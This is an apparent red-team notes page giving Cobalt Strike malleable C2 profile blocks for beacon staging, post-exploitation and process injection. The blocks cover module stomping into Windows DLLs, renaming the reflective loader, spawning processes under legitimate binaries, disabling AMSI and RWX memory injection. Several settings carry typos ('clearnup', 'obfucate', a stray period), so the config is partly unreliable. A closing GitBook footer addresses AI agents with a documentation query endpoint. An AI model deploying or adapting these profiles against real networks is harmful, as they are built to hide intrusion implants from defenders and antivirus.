> For the complete documentation index, see [llms.txt](https://f1rstbyt3.gitbook.io/hacking-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://f1rstbyt3.gitbook.io/hacking-notes/command-and-control/cobaltstrike/malleable-profiles.md).

# Malleable Profiles

{% embed url="<https://github.com/FortyNorthSecurity/C2concealer>" %}

{% embed url="<https://github.com/threatexpress/random_c2_profile>" %}

### Options:

```bash
#size of the assembly/powershell scripts 
set tasks_max_size "";

```

### Beacons:&#x20;

<pre><code><strong>stage {
</strong><strong>	set compile_time "DATE OF COMPILATION";
</strong><strong>	set image_size_x64 "522090";
</strong><strong>	set image_size_x86 "522090";
</strong><strong>	set clearnup "true";
</strong><strong>	set obfucate "true";
</strong><strong>	set name "dataparse.dll";
</strong><strong>	set module_x86 "wuaueng.dll";
</strong><strong>	set module_x64 "mssrch.dll";
</strong><strong>	set stomppe "true";
</strong><strong>	transform-x86 {
</strong><strong>		strrep "ReflectiveLoader" "RunHelloWorld";
</strong><strong>		}
</strong><strong>	transform-x64 {
</strong>		strrep "ReflectiveLoader" "PrintMenu";
		}
}

</code></pre>

<figure><img src="/files/HN4eQkypsMclfwpzXHTD" alt=""><figcaption></figcaption></figure>

### Post-Ex:

```
##         = random numbers
msagent_## = standard communications 
status_##  = staging over SMB
```

```svg
post-ex {
      # control the temporary process we spawn to
      set spawnto_x86 "`%windir%\syswow64\dllhost.exe` -k netsvcs";.
      set spawnto_x64 "%windir%\\sysnative\\mstsc.exe";

      # change the permissions and content of our post-ex DLLs 
      set obfuscate "true";

      # change our post-ex output named pipe names... _
      set pipename "evil_####, stuff\\not_##_ev#l";
      set pipename_stager "update_##";

      # pass key function pointers from Beacon to its child jobs 
      set smartinject "true";

      # disable AMSI in powerpick, execute-assembly, and psinject 
      set amsi_disable "true";
}

```

### Process-Inject:

```
process-inject {
    # set how memory is allocated in a remove process:
    set allocator "VirtualAllocEx";
    
    # shape memory characteristics and content:
    set min_alloc "16384";
    set startrwx "true";
    set userwx "false";
    
    transform-x86 {
        prepend "\x90\x90";
    }
    transform-x64 {
        prepend "\x90\x90";
    }
    
    # determine how to execute the injected code
    execute {
        CreateThread "ntdll.dll!RtlUserThreadStart";
        SetThreadContext;
        RtlCreateUserThread;
    }
}
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://f1rstbyt3.gitbook.io/hacking-notes/command-and-control/cobaltstrike/malleable-profiles.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.